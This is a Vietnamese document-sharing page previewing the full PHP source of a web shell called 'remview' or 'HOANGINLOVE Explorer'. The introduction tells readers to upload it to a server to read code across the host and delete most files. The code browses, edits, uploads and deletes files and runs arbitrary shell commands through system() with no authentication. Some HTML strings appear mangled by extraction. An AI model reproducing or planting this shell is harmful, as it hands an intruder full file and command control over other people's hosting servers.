Tải bản đầy đủ (.pdf) (6 trang)
  1. Trang chủ
    2. >>
  2. Công Nghệ Thông Tin
    3. >>
  3. An ninh - Bảo mật

View code bằng file PHP ppt

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (99.88 KB, 6 trang )

View code :
Copy nội dung sau thành 1 file *.php. Up lên server, chạy file đó, bạn có thể
xem code của hầu hết các file trong host, chịu khó tìm hiểu 1 chút thì có thể
view code toàn server, hoạc thêm chút lệnh của unix nữa là có thể xóa del hầu
hết mí file trong đó.
<?php
$default_directory = dirname($PATH_TRANSLATED);
$show_icons = 0; define("REMY_EXPLORER_VERSION", "v1.0");
define("BACKGROUND_COLOR", "\"#000000\"");
define("FONT_COLOR", "\"#ffffff\"");
define("TABLE_BORDER_COLOR", "\"#ffffff\"");
define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
define("TABLE_FONT_COLOR", "\"#ffffff\"");
define("COLOR_PRIVATE", "\"#ffbb99\"");
define("COLOR_PUBLIC", "\"#000000\"");
define("TRUE", 1);
define("FALSE", 0);
if (!isset($dir)) $dir = $default_directory;
$dir = stripslashes($dir);
$dir = str_replace("\\", "/", $dir);
$associations = array( "gif" => array( "function" => "viewGIF", "icon" =>
"icons/image2.gif" ), "jpg" => array( "function" => "viewJPEG", "icon" =>
"icons/image2.gif" ), "jpeg" => array( "function" => "viewJPEG", "icon" =>
"icons/image2.gif" ), "wav" => array( "function" => "", "icon" =>
"icons/sound.gif" ), "mp3" => array( "function" => "", "icon" =>
"icons/sound.gif" ) );
if ($action != "view"): ?>
<html>
<head>
<title>HOANGINLOVE Explorer - remview</title>
<style type="text/css">


<! .body { font-family: 'Verdana'; font-size: 13; color: <? echo FONT_COLOR;
?> } table, div, tr, td
{font: 13 'Verdana'; color: <? echo TABLE_FONT_COLOR; ?> }
a {text-decoration: none; color: "#00ff00" }
a:hover {text-decoration: underline; color: "#ff0000" }
> </style> </head>
<body class="body" bgcolor=<? echo BACKGROUND_COLOR; ?>> <? endif;
function readDirectory($directory)
{ global $files, $directories, $dir;
$files = array();
$directories = array();
$a = 0; $b = 0;
$dirHandler = opendir($directory);
while ($file = readdir($dirHandler))
{ if ($file != "." && $file != " ")
{ $fullName = $dir.($dir == "/" ? "" : "/").$file;
if (is_dir($fullName)) $directories[$a++] = $fullName;
else $files[$b++] = $fullName; } }
sort($directories); sort($files); };
function showInfoDirectory($directory)
{ global $PHP_SELF; $dirs = split("/", $directory);
print "<b>Directory /"; for ($i = 1; $i < (sizeof($dirs));
$i++) { print "<a href=\"$PHP_SELF?dir=";
for ($a = 1; $a <= $i; $a++) echo "/$dirs[$a]"; echo "\">$dirs[$i]";
if ($directory != "/") echo "/"; } print "</b>\n";
print "Free space on disk: ";
$freeSpace = diskfreespace($directory);
if ($freeSpace/(1024*1024) > 1024) printf("%.2f GBytes",
$freeSpace/(1024*1024*1024));
else echo (int)($freeSpace/(1024*1024))."Mbytes\n"; };

function showDirectory($directory)
{ global $files, $directories, $fileInfo, $PHP_SELF;
readDirectory($directory);
showInfoDirectory($directory); ?>
<p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<?
echo TABLE_BORDER_COLOR; ?>>
<tr bgcolor="#000000"> <? if ($show_icons): ?> <td width="16"
align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>
</td> <? endif; ?>
<td align="center">
<b><small>NAME</small></b></td>
<td align="center"><b><small>SIZE</small></b></td>
<td align="center"><b><small>LAST MODIF.</small></b></td>
<td align="center"><b><small>PERMISSIONS</small></b></td>
<td align="center"><b><small>ACTIONS</small></b></td> </tr>
<? for ($i = 0; $i < sizeof($directories);
$i++) { $fileInfo->getInfo($directories[$i]);
showFileInfo($fileInfo); } for ($i = 0; $i < sizeof($files); $i++) { $fileInfo-
>getInfo($files[$i]);
showFileInfo($fileInfo); } ?>
</table>
<? }; class fileInfo { var $name, $path, $fullname, $isDir, $lastmod, $owner,
$perms, $size, $isLink, $linkTo, $extension; function permissions($mode) {
$perms = ($mode & 00400) ? "r" : "-";
$perms .= ($mode & 00200) ? "w" : "-";
$perms .= ($mode & 00100) ? "x" : "-";
$perms .= ($mode & 00040) ? "r" : "-";
$perms .= ($mode & 00020) ? "w" : "-";
$perms .= ($mode & 00010) ? "x" : "-";
$perms .= ($mode & 00004) ? "r" : "-";

$perms .= ($mode & 00002) ? "w" : "-";
$perms .= ($mode & 00001) ? "x" : "-"; return $perms; }
function getInfo($file)
{ $this->name = basename($file);
$this->path = dirname($file);
$this->fullname = $file; $this->isDir = is_dir($file);
$this->lastmod = date("m/d/y, H:i", filemtime($file));
$this->owner = fileowner($file);
$this->perms = $this->permissions(fileperms($file));
$this->size = filesize($file);
$this->isLink = is_link($file);
if ($this->isLink) $this->linkTo = readlink($file);
$buffer = explode(".", $this->fullname);
$this->extension = $buffer[sizeof($buffer)-1]; } };
$fileInfo = new fileInfo; function showFileInfo($fileInfo)
{ global $PHP_SELF, $associations; echo "\n<tr
bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";
if ($show_icons) {
echo "<td>"; if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";
elseif ($associations[$fileInfo->extension]["icon"] != "") echo "<img
src=\"".$associations[$fileInfo->extension]["icon"]."\">";
else echo "<img src=\"icons/generic.gif\">"; echo "</td>"; } echo "<td
align=\"left\"";
if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE; echo ">";
if ($fileInfo->isLink) { echo $fileInfo->name." -> ";
$fileInfo->fullname = $fileInfo->linkTo;
$fileInfo->name = $fileInfo->linkTo; }
if ($fileInfo->isDir) { echo "<b>fullname\" ";
echo ">$fileInfo->name</b>"; }

else echo $fileInfo->name;
echo "</td>";
echo "<td>$fileInfo->size</td>";
echo "<td>$fileInfo->lastmod</td>";
echo "<td>$fileInfo->perms</td>";
echo "<td>"; if (!$fileInfo->isDir) {
if ($fileInfo->perms[6] == 'r') { echo "fullname&action=view\"> View"; }
if ($fileInfo->perms[7] == 'w') {
echo "fullname&action=edit\"> Edit"; echo "fullname&action=delete\"> Del"; }
}
echo "</tr>"; };
function viewFile($file)
{ global $associations, $fileInfo;
$fileInfo->getInfo($file);
if (!$associations[$fileInfo->extension] || $associations[$fileInfo-
>extension]["function"] == "") showFile($file);
else $associations[$fileInfo->extension]["function"]($file); };
function showFile($file, $editing = 0)
{ global $PHP_SELF, $dir; $handlerFile = fopen($file, "r") or die("ERROR opening
file $file");
if ($editing) echo "<h3>
<b>Edit file $file</b></h3><hr>";
else echo "<h3><b>File $file</b></h3><hr>";
echo "<form";
if ($editing) echo " action=\"$PHP_SELF?action=save&dir=$file\"
method=\"post\"";
echo ">";
$buffer = fread($handlerFile, filesize($file));
$buffer = str_replace("&", "&", $buffer);
$buffer = str_replace("<", "<", $buffer);

$buffer = str_replace(">", ">", $buffer);
echo "<textarea wrap=\"off\" cols=\"90\" rows=\"20\"
name=\"text\">$buffer</textarea>";
if ($editing) echo "<p>
<input type=\"submit\" name=\"Submit\" value=\"Save
changes\"></p>\n</form>";
echo "</form>";
fclose($handlerFile); };
function saveFile($file)
{ global $dir, $text; $handlerFile = fopen($file, "w") or die("ERROR: Could not
open file ".basename($file)." for writing");
$text = stripslashes($text);
fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
fclose($handlerFile);
echo "Changes has been saved in ".basename($file)."<hr>";
$dir = dirname($file); };
function uploadFile()
{ global $HTTP_POST_FILES,$dir;
copy($HTTP_POST_FILES["userfile"][tmp_name],
$dir."/".$HTTP_POST_FILES["userfile"][name]) or die("Error uploading
file".$HTTP_POST_FILES["userfile"][name]);
echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
//unlink($userfile); };
function deleteFile($file)
{ global $confirm;
if ($confirm != TRUE) die("Confirm deletion of $file");
else {
if (!unlink($file)) return FALSE; return TRUE; } };
function viewFileHeader($file, $header)
{ header($header); readfile($file); };

function viewGIF($file)
{ viewFileHeader($file, "Content-type: image/gif"); };
function viewJPEG($file)
{ viewFileHeader($file, "Content-type: image/jpeg"); };
switch ($action) { case "phpinfo": phpinfo();
die();
case "view": viewFile($dir);
break;
case "edit": showFile($dir, 1); break;
case "download": viewFileHeader($dir, "Content-type: unknown"); break; case
"delete": if (!deleteFile($dir)) echo "Could not delete file $dir
"; else echo "File $dir deleted succesfully
"; $dir = dirname($dir);
showDirectory($dir);
break; case "exec": echo "<pre>\n";
echo system($dir);
echo "\n</pre>";
exit();
case "upload": uploadFile(); showDirectory($dir);
break;
case "save": saveFile($dir);
default: showDirectory($dir); break; };
if ($action != "view"): ?>
<p> <table border="0"> <tr><td>
<form method="get" action=<? echo "\"$PHP_SELF\""; ?>>
<input type="hidden" name="dir_from" value=<? echo "\"$dir\""; ?>> <select
name="action" size="1"> <option value="jump" selected>Jump to
directory</option> <option value="makedir">Create directory</option> <!
Not implemented yet > <option value="exec">Execute shell cmd</option>
</select>

<input type="text" name="dir" size="20">
<input type="submit" value="Go"> </form> </td>
<? if ((fileperms($dir) & 00002)): ?> <td>
<form enctype="multipart/form-data" action="<? print
"$PHP_SELF?dir=$dir&action=upload"; ?>" method=post> <input
type="hidden" name="MAX_FILE_SIZE" value="1000000">
<input name="userfile" type="file">
<input type="submit" value="Upload file"> </form> </td>
<? endif; ?> </tr> </table> <p> <hr> </p> </body> </html> <? endif; ?>

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×